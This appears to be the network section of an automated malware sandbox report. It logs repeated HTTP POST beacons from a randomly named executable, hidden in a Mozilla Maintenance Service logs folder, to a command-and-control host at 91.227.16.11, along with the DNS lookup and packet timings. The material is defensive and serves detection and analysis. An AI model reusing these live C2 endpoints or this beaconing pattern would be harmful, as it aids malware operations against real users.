                                                                    Mar 5, 2024 22:28:43.355164051 CET804980291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:43.355372906 CET4980280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:43.566812992 CET804980291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:43.594196081 CET804980291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:43.638724089 CET4980280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:43.713891983 CET4980380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:43.924006939 CET804980391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:43.924304008 CET4980380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:43.924304008 CET4980380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:44.134895086 CET804980391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:44.134926081 CET804980391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:44.135270119 CET4980380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:44.345453024 CET804980391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:44.376697063 CET804980391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:44.420186996 CET4980380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:44.495151997 CET4980380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:44.497172117 CET4980480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:44.705214977 CET804980391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:44.705442905 CET4980380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:44.707187891 CET804980491.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:44.707390070 CET4980480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:44.707488060 CET4980480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:44.917457104 CET804980491.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:44.917486906 CET804980491.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:44.917890072 CET4980480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:45.128247023 CET804980491.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:45.155961037 CET804980491.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:45.201298952 CET4980480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:45.279408932 CET4980280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:45.283209085 CET4980480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:45.284167051 CET4980580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:45.493366003 CET804980491.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:45.493480921 CET4980480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:45.493977070 CET804980591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:45.494055986 CET4980580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:45.494246960 CET4980580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:45.704149008 CET804980591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:45.705544949 CET804980591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:45.705831051 CET4980580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:45.916584969 CET804980591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:45.945550919 CET804980591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:45.998080015 CET4980580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:46.072700977 CET4980580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:46.073510885 CET4980680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:46.282735109 CET804980591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:46.282788992 CET4980580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:46.283447981 CET804980691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:46.283514977 CET4980680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:46.283693075 CET4980680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:46.493550062 CET804980691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:46.493628025 CET804980691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:46.493868113 CET4980680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:46.704010963 CET804980691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:46.730211973 CET804980691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:46.779347897 CET4980680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:46.856309891 CET4980680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:46.857219934 CET4980780192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:47.066843987 CET804980691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:47.066939116 CET4980680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:47.067573071 CET804980791.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:47.067816973 CET4980780192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:47.067908049 CET4980780192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:47.277760029 CET804980791.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:47.277792931 CET804980791.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:47.278280020 CET4980780192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:47.490752935 CET804980791.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:47.515959024 CET804980791.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:47.560683966 CET4980780192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:47.635344982 CET4980780192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:47.636198044 CET4980880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:47.702955961 CET4980980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:47.823822975 CET4981080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:47.844937086 CET804980891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:47.845029116 CET4980880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:47.845113993 CET804980791.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:47.845182896 CET4980780192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:47.915785074 CET804980991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:47.915887117 CET4980980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:47.916030884 CET4980980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:48.033946037 CET804981091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:48.034096003 CET4981080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:48.034240007 CET4981080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:48.129184008 CET804980991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:48.129215956 CET804980991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:48.129556894 CET4980980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:48.244148970 CET804981091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:48.244180918 CET804981091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:48.244460106 CET4981080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:48.342720032 CET804980991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:48.366027117 CET804980991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:48.419995070 CET4980980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:48.454587936 CET804981091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:48.479636908 CET804981091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:48.529350996 CET4981080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:48.604646921 CET4980980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:48.605428934 CET4981180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:48.605432034 CET4981080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:48.815253019 CET804981191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:48.815279007 CET804981091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:48.815342903 CET4981180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:48.815365076 CET4981080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:48.815577030 CET4981180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:48.816998959 CET804980991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:48.817065001 CET4980980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:49.027138948 CET804981191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:49.027170897 CET804981191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:49.027487993 CET4981180192.168.2.591.227.16.11
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 5, 2024 22:27:37.762108088 CET | 61174 | 53 | 192.168.2.5 | 1.1.1.1
Mar 5, 2024 22:27:38.585751057 CET | 53 | 61174 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 5, 2024 22:27:37.762108088 CET | 192.168.2.5 | 1.1.1.1 | 0xe9a9 | Standard query (0) | h172956.srv11.test-hf.su | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 5, 2024 22:27:38.585751057 CET | 1.1.1.1 | 192.168.2.5 | 0xe9a9 | No error (0) | h172956.srv11.test-hf.su | | 91.227.16.11 | A (IP address) | IN (0x0001) | false
                                                                    • h172956.srv11.test-hf.su
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49712 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
Timestamp | Bytes transferred | Direction | Data
Mar 5, 2024 22:27:38.801529884 CET | 347 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 344
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
Mar 5, 2024 22:27:39.008857965 CET | 25 | IN | HTTP/1.1 100 Continue
Mar 5, 2024 22:27:39.332370996 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    Vary: Accept-Encoding
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt
Mar 5, 2024 22:27:39.390825033 CET | 323 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 384
                                                                    Expect: 100-continue
Mar 5, 2024 22:27:39.597853899 CET | 25 | IN | HTTP/1.1 100 Continue
Mar 5, 2024 22:27:39.830224991 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt
                                                                    Mar 5, 2024 22:27:39.903587103 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1908
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:27:40.110676050 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:40.343519926 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt
                                                                    Mar 5, 2024 22:27:40.485521078 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:27:40.692538023 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:40.930201054 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    1 | 192.168.2.5 | 49713 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:39.713490963 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:27:39.923392057 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:40.160717010 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    2 | 192.168.2.5 | 49716 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:41.332324982 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:27:41.539086103 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:41.779422998 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    3 | 192.168.2.5 | 49718 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:42.785655975 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:42.997656107 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:43.240186930 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    4 | 192.168.2.5 | 49719 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:43.897362947 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:44.106301069 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:44.340728045 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    5 | 192.168.2.5 | 49720 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:45.572776079 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:45.782732010 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:46.017302990 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    6 | 192.168.2.5 | 49722 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:47.591056108 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:47.802783966 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:48.041311026 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    7 | 192.168.2.5 | 49725 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:51.240278959 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:51.449037075 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:51.683653116 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    8 | 192.168.2.5 | 49726 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:51.393934965 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:51.600543022 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:51.835338116 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    9 | 192.168.2.5 | 49728 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:52.251434088 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:27:52.462318897 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:52.700391054 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    10 | 192.168.2.5 | 49729 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:53.072901011 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:53.283679008 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:53.283909082 CET | 2596 | OUT | request body (application/octet-stream)
                                                                    Mar 5, 2024 22:27:53.519001007 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    11 | 192.168.2.5 | 49730 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:27:53.895978928 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:54.104914904 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:54.105109930 CET | 2592 | OUT | request body (application/octet-stream)
                                                                    Mar 5, 2024 22:27:54.338901997 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
